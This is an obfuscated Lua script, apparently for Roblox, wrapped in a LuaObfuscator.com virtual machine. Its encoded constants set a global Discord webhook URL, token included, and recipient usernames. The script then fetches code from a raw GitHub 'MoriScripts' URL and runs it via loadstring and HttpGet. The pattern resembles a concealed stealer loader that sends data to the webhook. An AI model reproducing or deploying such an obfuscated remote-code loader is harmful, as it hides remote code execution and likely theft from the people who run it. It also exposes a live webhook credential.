--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-(1 -0))))%(2^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v85-(v85%((2206 -(1523 + 114)) -(367 + 201))) ;end end else local v86=0;local v87;while true do if (v86==(927 -(214 + 713))) then v87=(1 + 0 + 1)^(v32-1) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (877 -((401 -119) + 595)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + 4 ;return (v37 * (16778281 -(68 + (1114 -(32 + 85))))) + (v36 * (66806 -(226 + 1044))) + (v35 * (1114 -858)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=1) then else v41=nil;v42=nil;v38=4 -2 ;end if (0==v38) then v39=0 -0 ;v40=nil;v38=1 -0 ;end if (v38~=(5 -3)) then else v43=nil;v44=nil;v38=288 -(134 + 151) ;end if (v38~=3) then else v45=nil;v46=nil;v38=1669 -(970 + 695) ;end if (v38==(7 -3)) then while true do if (v39==2) then local v98=0;local v99;while true do if (v98==(0 -0)) then v99=1990 -(582 + 1408) ;while true do if (0~=v99) then else v44=nil;v45=nil;v99=1;end if (v99~=1) then else v39=2 + 1 ;break;end end break;end end end if (v39~=1) then else local v100=0 + 0 ;local v101;while true do if (v100==(0 -0)) then v101=0 -0 ;while true do if ((0 -0)~=v101) then else v42=nil;v43=nil;v101=3 -2 ;end if (v101~=(1 + 0)) then else v39=1826 -(1195 + 629) ;break;end end break;end end end if (v39~=0) then else local v102=753 -(239 + 514) ;local v103;while true do if (v102~=(0 -0)) then else v103=0;while true do if ((0 + 0)==v103) then local v131=241 -(187 + 54) ;while true do if (v131~=(780 -(162 + 618))) then else v40=0 + 0 ;v41=nil;v131=1 + 0 ;end if (v131==(2 -1)) then v103=1 + 0 ;break;end end end if (v103==(1 + 0)) then v39=732 -(476 + 255) ;break;end end break;end end end if (v39~=(1133 -(369 + 761))) then else v46=nil;while true do local v104=0 -0 ;local v105;while true do if (v104==(0 -0)) then v105=0 + 0 ;while true do if (v105~=(1637 -(1373 + 263))) then else if (v40~=(1002 -(451 + 549))) then else local v159=0 + 0 ;local v160;while true do if (v159==0) then v160=0 -0 ;while true do local v166=0;while true do if (v166~=0) then else if (v160~=(0 -0)) then else local v167=0;while true do if (v167==(1 -0)) then v160=1385 -(746 + 638) ;break;end if (v167==(0 + 0)) then local v170=216 -(42 + 174) ;while true do if (v170==1) then v167=1 + 0 ;break;end if (v170==(0 -0)) then for v179=342 -(218 + 123) ,v24() do local v180=1581 -(1535 + 46) ;local v181;local v182;local v183;while true do if (v180~=(0 + 0)) then else v181=0;v182=nil;v180=1 + 0 ;end if (v180~=(1 + 0)) then else v183=nil;while true do if ((0 + 0)==v181) then local v188=1504 -(363 + 1141) ;while true do if (v188==(561 -(306 + 254))) then v181=1 + 0 ;break;end if (v188==0) then v182=0;v183=nil;v188=1;end end end if (v181~=1) then else while true do if (v182==(0 + 0)) then v183=v22();if (v21(v183,1 -0 ,1 + 0 )==(1467 -(899 + 568))) then local v189=0 + 0 ;local v190;local v191;local v192;local v193;while true do if (v189==0) then v190=0 + 0 ;v191=nil;v189=2 -1 ;end if (v189==(605 -(268 + 335))) then while true do if (v190~=3) then else if (v21(v192,293 -(60 + 230) ,3)==(573 -(426 + 146))) then v193[1 + 3 ]=v46[v193[1460 -(282 + 1174) ]];end v41[v179]=v193;break;end if (v190==0) then local v195=811 -(569 + 242) ;while true do if ((0 -0)==v195) then v191=v21(v183,1663 -(1477 + 184) ,1 + 2 );v192=v21(v183,1028 -(706 + 318) ,6);v195=1252 -(721 + 530) ;end if (v195==(1272 -(945 + 326))) then v190=2 -1 ;break;end end end if (v190~=(2 + 0)) then else local v196=700 -(271 + 429) ;local v197;while true do if (v196~=(0 + 0)) then else v197=1500 -(1408 + 92) ;while true do if (v197~=(1086 -(461 + 625))) then else local v202=0;while true do if ((1288 -(993 + 295))==v202) then if (v21(v192,2 -1 ,1)==(305 -(244 + 60))) then v193[1 + 1 ]=v46[v193[1173 -(418 + 753) ]];end if (v21(v192,2,478 -(41 + 435) )==(1 + 0)) then v193[1 + 2 ]=v46[v193[3 + 0 ]];end v202=1 + 0 ;end if (v202==1) then v197=1;break;end end end if (v197==1) then v190=1 + 2 ;break;end end break;end end end if (v190~=(530 -(406 + 123))) then else local v198=1769 -(1749 + 20) ;local v199;while true do if (v198==0) then v199=0 + 0 ;while true do if (v199==(1 + 0)) then v190=1324 -(1249 + 73) ;break;end if (v199==(0 + 0)) then local v203=0;while true do if ((1139 -(782 + 356))==v203) then v199=1 + 0 ;break;end if (v203~=(0 -0)) then else v193={v23(),v23(),nil,nil};if (v191==(0 -0)) then local v208=1092 -(975 + 117) ;local v209;while true do if (v208==(1900 -(106 + 1794))) then v209=0 + 0 ;while true do if (v209==(0 + 0)) then v193[8 -5 ]=v23();v193[4]=v23();break;end end break;end end elseif (v191==(2 -1)) then v193[117 -(4 + 110) ]=v24();elseif (v191==(586 -(57 + 527))) then v193[1430 -(41 + 1386) ]=v24() -((105 -(17 + 86))^(11 + 5)) ;elseif (v191==(7 -4)) then local v214=0;local v215;while true do if ((0 -0)==v214) then v215=0 -0 ;while true do if (0==v215) then v193[8 -5 ]=v24() -(2^(182 -(122 + 44))) ;v193[6 -2 ]=v23();break;end end break;end end end v203=2 -1 ;end end end end break;end end end end break;end if (v189==(3 -2)) then v192=nil;v193=nil;v189=613 -(602 + 9) ;end end end break;end end break;end end break;end end end for v184=1 + 0 ,v24() do v42[v184-(1 + 0) ]=v29();end v170=1;end end end end end if (v160==(873 -(826 + 46))) then return v44;end break;end end end break;end end end break;end if (v105~=(0 -0)) then else local v147=65 -(30 + 35) ;while true do if (v147~=(0 + 0)) then else if (v40==1) then local v161=0 + 0 ;local v162;while true do if (v161==(1257 -(1043 + 214))) then v162=1898 -(260 + 1638) ;while true do if (v162==(0 -0)) then local v168=0;while true do if (v168==(1212 -(323 + 889))) then v45=v24();v46={};v168=441 -(382 + 58) ;end if (v168~=(2 -1)) then else v162=1;break;end end end if (v162==(581 -(361 + 219))) then local v169=320 -(53 + 267) ;while true do if (v169==(0 + 0)) then for v174=1 + 0 ,v45 do local v175=413 -(15 + 398) ;local v176;local v177;local v178;while true do if (v175==1) then v178=nil;while true do if (v176~=(0 -0)) then else local v186=982 -(18 + 964) ;while true do if (v186==(0 -0)) then v177=v22();v178=nil;v186=3 -2 ;end if (v186==1) then v176=1 + 0 ;break;end end end if (v176==1) then if (v177==(1 + 0)) then v178=v22()~=(0 + 0) ;elseif (v177==(685 -(483 + 200))) then v178=v25();elseif (v177==(853 -(20 + 830))) then v178=v26();end v46[v174]=v178;break;end end break;end if (v175==(0 + 0)) then v176=1463 -(1404 + 59) ;v177=nil;v175=127 -(116 + 10) ;end end end v44[1 + 2 ]=v22();v169=739 -(542 + 196) ;end if (v169~=1) then else v162=3 -1 ;break;end end end if (v162==(1 + 1)) then v40=2 -0 ;break;end end break;end end end if ((0 + 0)==v40) then local v163=0;local v164;local v165;while true do if (v163~=1) then else while true do if (v164~=(0 + 0)) then else v165=0 -0 ;while true do if (v165~=(2 -1)) then else local v172=1551 -(1126 + 425) ;while true do if (v172~=(406 -(118 + 287))) then else v165=2 -0 ;break;end if (v172~=(0 + 0)) then else v43={};v44={v41,v42,nil,v43};v172=1 + 0 ;end end end if ((0 -0)==v165) then local v173=1121 -(118 + 1003) ;while true do if (v173==(1 + 0)) then v165=1;break;end if (v173==(0 + 0)) then v41={};v42={};v173=1;end end end if (v165==2) then v40=1 -0 ;break;end end break;end end break;end if (v163==(0 -0)) then v164=163 -(92 + 71) ;v165=nil;v163=1;end end end v147=1;end if (v147~=(1 + 0)) then else v105=378 -(142 + 235) ;break;end end end end break;end end end break;end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=766 -(574 + 191) ;local v50=(v21(v48,1 + 0 ,50 -30 ) * ((99 -(11 + 86))^(17 + 15))) + v47 ;local v51=v21(v48,870 -(254 + 595) ,157 -(55 + 71) );local v52=((v21(v48,(99 -58) -9 )==(1791 -(573 + 1217))) and  -(2 -1)) or (1 + 0) ;if (v51==(0 -0)) then if (v50==(939 -(714 + 225))) then return v52 * (0 -0) ;else local v92=0 -0 ;while true do if (v92==(0 + 0)) then v51=1 -0 ;v49=0;break;end end end elseif (v51==(2853 -(118 + 688))) then return ((v50==(48 -(25 + 23))) and (v52 * (((286 -(175 + 110)) + 0)/(1886 -(927 + 959))))) or (v52 * NaN) ;end return v8(v52,v51-((8705 -5257) -2425) ) * (v49 + (v50/(((3620 -2886) -(16 + (2512 -(503 + 1293))))^(99 -47)))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1 + 0) );v19=v19 + v53 ;local v55={};for v68=1 + 0 , #v54 do v55[v68]=v2(v1(v3(v54,v68,v68)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=0 + 0 + 0 ;local v57;while true do if (v56==(534 -((68 -25) + 490))) then return v57;end if (v56==(733 -(711 + 22))) then v57=v1(v16,v19,v19);v19=v19 + (3 -(1 + 1)) ;v56=860 -(240 + 619) ;end end end v23=nil;function v23()local v58=1744 -(1344 + 400) ;local v59;local v60;while true do if (v58==(3 -2)) then return (v60 * (661 -(255 + 150))) + v59 ;end if (0==v58) then v59,v60=v1(v16,v19,v19 + 2 + (1739 -(404 + 1335)) );v19=v19 + 2 + 0 ;v58=4 -(409 -(183 + 223)) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v88=v2(v0(v61,16));if v20 then local v93=v5(v88,v20);v20=nil;return v93;else return v88;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=10) then if (v83<=4) then if (v83<=1) then if (v83>0) then v80[v82[2]]=v82[3];else local v108=v82[2];local v109,v110=v73(v80[v108](v13(v80,v108 + 1 ,v82[3])));v75=(v110 + v108) -1 ;local v111=0;for v128=v108,v75 do v111=v111 + 1 ;v80[v128]=v109[v111];end end elseif (v83<=2) then v80[v82[2]][v82[3]]=v82[4];elseif (v83==3) then v80[v82[2]]=v82[3];else v80[v82[2]]();end elseif (v83<=7) then if (v83<=5) then local v114=0;local v115;while true do if (v114==0) then v115=v82[2];v80[v115]=v80[v115](v13(v80,v115 + 1 ,v75));break;end end elseif (v83>6) then v80[v82[2]]=v64[v82[3]];else v80[v82[2]]=v82[3]~=0 ;end elseif (v83<=8) then v80[v82[2]]=v82[3]~=0 ;elseif (v83>9) then v80[v82[2]]();else v80[v82[2]][v82[3]]=v82[4];end elseif (v83<=15) then if (v83<=12) then if (v83==11) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else local v117=v82[2];local v118=v80[v82[3]];v80[v117 + 1 ]=v118;v80[v117]=v118[v82[4]];end elseif (v83<=13) then local v122=0;local v123;local v124;while true do if (v122==1) then v80[v123 + 1 ]=v124;v80[v123]=v124[v82[4]];break;end if (v122==0) then v123=v82[2];v124=v80[v82[3]];v122=1;end end elseif (v83>14) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else do return;end end elseif (v83<=18) then if (v83<=16) then v80[v82[2]]=v64[v82[3]];elseif (v83==17) then local v140=v82[2];local v141,v142=v73(v80[v140](v13(v80,v140 + 1 ,v82[3])));v75=(v142 + v140) -1 ;local v143=0;for v155=v140,v75 do v143=v143 + 1 ;v80[v155]=v141[v143];end else do return;end end elseif (v83<=19) then v74=v82[3];elseif (v83==20) then v74=v82[3];else local v145=v82[2];v80[v145]=v80[v145](v13(v80,v145 + 1 ,v75));end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31363830393338313938303431383130382F58716138686341372O644B3074666D77764F4941306B64762O37614C72734C4F6D7366495A575F6A42594C796A617359766D303175572O51615A7A58432D6A34326F4637030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030B3O00583250656E69776569733203093O00557365724E616D653200173O0012033O00013O00260B3O000E000100020004143O000E0001001210000100033O003009000100040005001210000100063O001210000200073O00200C000200020008001203000400094O0006000500016O000200054O001500013O00022O000A0001000100010004143O0016000100260B3O0001000100010004143O00010001001210000100033O0030090001000A000B001210000100033O0030090001000C000B0012033O00023O0004143O000100012O000E3O00017O00",v9(),...);end
